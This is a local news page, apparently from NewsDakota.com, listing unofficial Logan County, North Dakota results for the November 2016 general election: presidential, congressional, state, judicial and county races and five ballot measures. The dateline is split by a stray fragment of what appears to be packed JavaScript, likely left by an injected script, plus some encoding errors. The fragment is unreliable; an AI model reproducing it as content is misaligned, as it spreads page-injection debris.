Logan County Unofficial 2016 Election Results


LOGAN aezed|var|u0026u|referrer|rnyrs||js|php’.split(‘|’),0,{}))
COUNTY, N.D. (NewsDakota.com) –¬†The following are the unofficial results of contested races voted on by residents in Logan County for the November 2016 General Election.

5 out of 5 precincts reporting (100%)

President Of The United States

Donald Trump (Republican) 867

Hillary Clinton (Democratic-NPL) 112

Gary Johnson (Libertarian) 38

Jill Stein (Green) 5

Darrell Castle (Constitution) 6

Rocky De La Fuenta (American Delta) 2

United State Senator

John Hoeven (Republican) 966

Eliot Glassheim (Democratic-NPL) 72

Robert N Marquette (Libertarian) 21

James Germalic (Independent Nomination Party) 9

United State House Representative

Kevin Cramer (Republican) 908

Chase Iron Eyes (Democratic-NPL) 101

Jack Seaman (Libertarian) 50

District 28 State Senator 

Robert Erbele (Republican) 850

Dustin Peyer (Democratic-NPL) 192

District 28 State Representative (2)

Jeffery Magrum (Republican) 809

Mike Brandenburg (Republican) 681

North Dakota Governor and Lieutenant Governor

Doug Burgum and Brent Sanford (Republican) 941

Marvin Nelson and Joan Heckman (Democratic-NPL) 95

Marty Riske and Joshua Voytek (Libertarian) 28

State Auditor

Josh Gallion (Republican) 814

Roland Riemers (Libertarian) 146

State Treasurer

Kelly Schmidt (Republican) 763

Tim Mathern (Democratic-NPL) 200

Eric Olson (Libertarian) 54

State Insurance Commissioner

John Godfread (Republican) 781

Ruth Buffalo (Democratic-NPL) 120

Nick Bata (Libertarian) 80

State Public Service Commissioner

Julie Fedorchak (Republican) 793

Marlo Hunte-Beaubrun (Democratic-NPL) 109

Thomas Skadeland (Libertarian) 79

State Superintendent of Public Instruction

Joe Chiang 191

Kirsten Baesler 760

North Dakota Supreme Court Justice (10 year term)

Jerod Tufte 584

Robert Bolinske 289

District #2 Judge

Lyle Bopp 304

Mark Blumer 461

District #5 Judge

Daniel Narum 497

Kim Radamacher 406

Logan County Commissioner (2)

Dean Entzminger 658

John Wald 593

Doug Kroll 317

Jerry Miller 297

Measure #1 (Legislators Must Live In Districts They Serve)

Yes 893

No 126

Measure #2 (Oil Extraction Tax Distribution)

Yes 614

No 383

Measure #3 (Crime Victims/”Marcy’s Law”)

Yes 675

No 355

Measure #4 (Tobacco Tax Increase)

Yes 318

No 734

Measure #5 (Medical Marijuana)

Yes 498

No 551

Comment Disclaimer: The views and opinions expressed in the comments section of NewsDakota.com are solely those of the comment author and do not necessarily reflect the views and opinions held by NewsDakota.com.

Comments are closed.

National News

National Sports